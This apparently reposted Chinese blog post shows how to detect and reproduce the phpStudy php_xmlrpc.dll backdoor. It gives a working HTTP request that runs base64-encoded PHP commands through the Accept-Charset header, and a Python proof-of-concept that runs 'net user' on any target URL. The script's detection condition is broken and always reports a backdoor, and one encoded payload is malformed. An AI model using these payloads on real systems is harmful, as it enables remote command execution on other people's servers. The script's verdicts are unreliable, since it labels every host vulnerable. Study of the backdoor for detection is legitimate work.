phpstudy后门检验+复现

最近phpstudy被爆出有后门,当时我还毫不在意,觉得自己不可能…然后,打脸
看着自己的phpstudy2018,数据库突然出问题,才发现自己已经成为别人的肉鸡好多年。。。
快来看看你的phpstudy有没有这样的后门吧

不想复现只想看看的,可以打开cmd,使用命令:

cd phpstudy
findstr /m /s /c:"@eval" *.*

phpstudy后门检验+复现_第1张图片
一般找到了,就差不多是有后门了,考虑卸载重新安装官网php或者360木马查杀

复现:

准备工作:win10虚拟机,phpstudy20181102,bp抓包工具

找到PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
记事本打开
搜索:eval,得到:@eval(%s(’%s’)) 一般有这一串就差不多是后门了
phpstudy后门检验+复现_第2张图片
启动phpstudy,我的版本是php-5.4.45+apache
exp:
Accept-Charset是命令执行的地方:命令是base64加密后的system(‘calc.exe’);

GET / HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdjYWxjLmV4ZScpOw==
Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282
Connection: close


执行:

执行:phpinfo();
base64加密 ----> cGhwaW5mbyUyOCUyOSUzQg==
phpstudy后门检验+复现_第3张图片

除了phpstudy2018版本以外,还有phpstudy2016版本
Phpstudy 2016版php-5.4
Phpstudy 2018版php-5.2.17
Phpstudy 2018版php-5.4.45
后门路径为:\php\php-5.2.17\ext\php_xmlrpc.dll

脚本检验:

# -*-coding:utf-8 -*-

import requests 
import sys 
import base64

def Poc(ip):
    payload = "echo \"hello phpstudy\";"
    poc = "ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7"
    pay = base64.b64encode(payload.encode('utf-8'))
    #poc = str(pay,"utf-8")
    headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Connection": "close",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": poc,
    "Upgrade-Insecure-Requests": "1",
    }
    url = ip
    r = requests.get(url,headers=headers)
    #print(r.text)
    if "Administrator" or "DefaultAccount" or "Guest" "hello phpstudy"in r.text:
        print("存在phpstudy后门")
    else:
        print("不存在phpstudy后门")

if len(sys.argv) < 2:
    print("python phpstudy.py http://127.0.0.1")
else:
    Poc(sys.argv[1])


解决办法:360(良心商家)

你可能感兴趣的:(漏洞复现)